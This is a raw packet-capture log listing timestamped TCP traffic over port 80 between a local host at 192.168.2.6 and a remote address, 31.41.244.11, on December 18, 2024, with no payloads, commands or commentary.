                                                                                                                                                                  Dec 18, 2024 11:09:31.636660099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.637711048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.637726068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.637738943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.637758017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.637758017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.638497114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.639558077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.639569998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.639581919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.639625072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.639625072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.640626907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.640639067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.640655994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.640696049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.640696049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.642477989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.642494917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.642507076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.642688036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.643572092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.643584013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.643595934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.643654108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.643654108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.645546913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.645560026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.649975061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.777321100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.777411938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.777436972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.777507067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.777793884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.777834892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.777883053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.778553963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.778590918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.778590918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.778660059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.779529095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.779567957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.779567957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.779634953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.780494928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.780531883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.780531883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.780694962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.781656981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.781694889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.781712055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.781966925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.782448053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.782504082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.782623053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.783515930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.783540964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.783544064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.783576012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.783576012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.784456015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.784493923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.784506083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.785408020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.785444021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.785444021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.785468102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.786693096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.786735058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.786735058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.786909103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.787409067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.787445068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.787445068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.787484884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.788440943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.788455963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.788516998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.788557053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.788557053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.789463043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.790488005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.798122883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.798193932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.798203945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.798296928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.798332930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.798332930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.798347950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.798427105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.799299002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.799362898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.799397945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.799398899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.800246954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.800286055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.800348997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.800554037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.801470041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.801516056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.801630974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.802457094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.802486897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.802498102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.802525043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.802525043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.803214073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.803252935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.803307056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.804181099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.804218054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.804219007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.804337978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.805200100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.805237055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.805237055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.805285931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.805500984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.806154966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.806226015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.806261063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.806261063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.807125092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.807229996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.807265997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.807265997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.808121920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.808316946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.808353901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.808353901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.809112072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.809230089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.809264898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.809264898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.810128927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.810261965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.810297966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.810297966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.811228037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.811352968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.811389923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.811389923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.812028885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.812066078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.812096119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.812096119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.813007116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.813101053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.813137054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.813137054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.814048052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.814152002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.814188004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.814188004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.815007925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.815046072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.815071106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.815104961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.815985918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.816117048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.816150904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.816150904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.816948891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.817038059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.817074060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.817074060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.817925930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.817964077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.818108082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.818938017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.818974972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.818974972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.819037914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.820138931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.820177078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.820177078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.820242882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.820899010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.820936918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.820936918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.821012020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.821994066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.822032928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.822032928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.822132111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.823360920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.823374987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.823396921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.823396921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.823482037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.823905945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.823941946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.823971987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.824871063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.824907064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.824907064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.824948072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.825826883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.825864077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.825864077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.825920105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.826494932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.826822996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.826863050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.826906919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.827804089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.827841997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.827841997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.827897072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.828769922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.828808069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.828808069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.828840017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.829507113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.829744101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.829783916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.829830885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.830806971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.830842972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.830842972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.831082106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.831680059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.831716061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.831716061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.831779957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.832676888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.832714081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.832714081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.832776070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.833678961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.833718061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.833718061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.833813906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.834691048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.834728003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.834728003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.834849119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.835484982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.835635900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.835805893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.835841894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.835841894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.968518972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.968534946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.968648911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.968671083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.968713045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.968926907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.968966961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.969624043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.969666004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.969667912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.969700098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.970446110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.970487118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.970554113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.970617056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.971419096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.971467972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.971534967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.972296000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.972373009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.972409964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.972477913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.972521067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.973366976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.973403931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.973488092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.973522902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.974370956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.974513054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.974528074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.974548101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.975349903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.975433111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.975449085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.975492954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.976339102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.976385117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.976424932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.976706028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.977350950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.977416039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.977547884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.977547884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.978286028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.978324890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.978399038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.978640079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.979252100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.979295969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.979366064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.979408979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.980226994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.980272055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.989017963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.989129066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.989145994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.989320993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.989518881 CET804991231.41.244.11192.168.2.6
